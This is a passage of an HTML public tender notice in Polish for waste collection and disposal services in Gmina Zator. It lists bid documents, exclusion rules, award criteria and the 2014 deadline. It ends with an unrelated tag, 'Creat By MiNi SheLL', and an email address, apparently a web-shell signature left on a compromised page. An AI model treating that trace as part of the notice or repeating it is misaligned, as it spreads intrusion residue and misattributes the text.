<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.
1. Wypełniony i podpisany przez uprawnionego przedstawiciela do reprezentowania wykonawcy formularz ofertowy wraz z formularzem cenowym - załącznik nr 1do oferty;
2. Podpisane przez uprawnionego przedstawiciela do reprezentowania wykonawcy oświadczenie Wykonawcy zgodnie z art. 22 ust. 1 pkt 1-4 ustawy - zał. nr 2 do oferty.
3. Podpisane przez uprawnionego przedstawiciela do reprezentowania wykonawcy oświadczenie Wykonawcy zgodnie z art. 24 ust. 1 i 2 Ustawy - zał. nr 3 do oferty.
4. a/ zezwolenie na prowadzenie działalności w zakresie transportu odpadów wydane na podstawie ustawy o odpadach z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21), 
b/ zaświadczenie o wpisie wykonawcy do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Zator, prowadzonego przez Burmistrza Zatora, zgodnie z przepisami art. 9b i 9c ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tekst jedn.  Dz. U. z 2012 r., poz. 391) - zał. nr 4a, 4b  do oferty.
c/ kopia aktualnego zezwolenia zintegrowanego na prowadzenie  instalacji  - zał. nr 4c do oferty.
5. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług,  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem  dowodów, czy zostały wykonane lub są wykonywane  należycie, zgodnie z opisem warunku udziału w postępowaniu zawartym w pkt VI, SIWZ z uwzględnieniem :
a/ - co najmniej jednej usługi, której przedmiotem był lub jest odbiór i przekazanie zmieszanych odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz od właścicieli nieruchomości, na  których  nie zamieszkują   mieszkańcy,   a   powstają   odpady   komunalne   do   podmiotu uprawnionego   do   zagospodarowania   takich   odpadów,   o   łącznej   wielkości   min. 2.000 Mg,
- co najmniej jednej usługi, której przedmiotem był lub jest odbiór i przekazanie segregowanych odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz od właścicieli nieruchomości, na  których nie   zamieszkują   mieszkańcy,  a powstają   odpady komunalne do podmiotu odzyskującego lub prowadzącego recykling takich odpadów, o łącznej wielkości min. 250 Mg,
b/ - co   najmniej   jednej   usługi   przesortowania niesegregowanych   (zmieszanych) odpadów komunalnych odbieranych od właścicieli nieruchomości lub przez podmioty odbierające odpady  od  właścicieli nieruchomości w ilości co najmniej 2.000 Mg,
- co najmniej jednej usługi zagospodarowania odpadów poprzez składowanie niesegregowanych (zmieszanych) odpadów komunalnych w ilości co najmniej 2.000 Mg, - jako zał. nr 5a i 5b do oferty. 
6. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (dot. łącznie odbierania i zagospodarowania odpadów, w tym również  jednej osoby posiadającej doświadczenie w kierowaniu składowiskiem odpadów), zgodnie z opisem warunku udziału w  postępowaniu zawartym w pkt VI, SIWZ  - jako zał. nr 6 do oferty. 
7. Wykaz narzędzi, wyposażenia i urządzeń technicznych dostępnych wykonawcy usług (dot. odbierania i zagospodarowania odpadów), w celu realizacji   zamówienia wraz z informacją o podstawie dysponowania tymi zasobami zgodnie z opisem warunku udziału w  postępowaniu zawartym w pkt VI SIWZ  - zał. nr 7a, 7b do oferty, 
8. Kopia opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - zgodnie z opisem warunku udziału w postępowaniu zawartym w pkt. VI SIWZ. - zał. nr 8 do oferty.
UWAGA ! Z treści oferty (np. z treści polisy) musi wynikać, że na dzień składania ofert jest ona opłacona.  
9. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich) - zał. nr 9 do oferty.
10. Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy  pzp., albo informacja o tym, że nie należy do grupy kapitałowej (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich) - zał. nr 10 do oferty.
11. Jeżeli  wykonawca przewiduje udział  podwykonawców określi rzeczowo-finansowy zakres robót, które zamierza  powierzyć do realizacji podwykonawcom - zał. nr 11 do oferty.
12. Dowód wniesienia wadium.   

B. W celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, w sytuacji gdy wykonawca wykazując spełnianie tych warunków, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b  ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda w odniesieniu do tych podmiotów następujących dokumentów:
1. Podpisane przez uprawnionego przedstawiciela do reprezentowania wykonawcy oświadczenie Wykonawcy  zgodnie z art. 24 ust. 1 i 2 Ustawy - zał. nr 3 do oferty.
2. Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy pzp., albo informacja o tym, że nie należy do grupy kapitałowej - zał. nr 10 do oferty.
3. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,  jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed  upływem terminu składania ofert,  - zał. nr 9 do oferty.

W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych   zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy jaka zostanie zawarta z wybranym wykonawcą stanowi załącznik nr 1A do SIWZ.
2. Zamawiający przewiduje następujące możliwości dokonania zmiany zawartej umowy oraz określa warunki takiej zmiany w przypadku:
a/ ustawowej zmiany stawki podatku od towarów i usług (VAT), wówczas zmienione zostanie wynagrodzenie Wykonawcy brutto o procent zmiany podatku VAT,
b/ terminu realizacji zadania, który może ulec zmianie w przypadkach, na które Zamawiający bądź Wykonawca nie mógł mieć wpływu:
- wystąpienie okoliczności lub zdarzeń uniemożliwiających realizację w wyznaczonym terminie przedmiotu zamówienia, bez możliwości usunięcia lub likwidacji powyższych okoliczności lub zdarzeń. 
- warunkiem zmiany terminu umownego realizacji przedmiotu zamówienia jest stwierdzenie przez Zamawiającego, na wniosek Wykonawcy, konieczności zmiany terminu umownego,
c/ terminów płatności i innych:
- aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych w siwz rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia,
- zmiany w obowiązujących przepisach - w tym przepisach prawa miejscowego, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego.
3. Uzgodnione dwustronnie zmiany harmonogramów realizacji umowy (w zakresie terminów), nie stanowią zmiany umowy.
4. W razie zmiany przepisów prawa dot. utrzymania czystości i porządku w gminach, Wykonawca na żądanie Zamawiającego dostosuje harmonogramy odbioru odpadów (po uzgodnieniu z Zamawiającym) do tych zmian. Zmiany te nie wymagają aneksu do umowy. System rozliczania odebranych odpadów nie ulega zmianie. 
5. Zamawiający zawrze umowę z wybranym Wykonawcą w terminach, o których mowa w art. 94 Pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zator.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zatorze, Plac Marszałka Józefa Piłsudskiego 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2014 godzina 10:00, miejsce: Urząd Miejski w Zatorze, Plac Marszałka Józefa Piłsudskiego 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com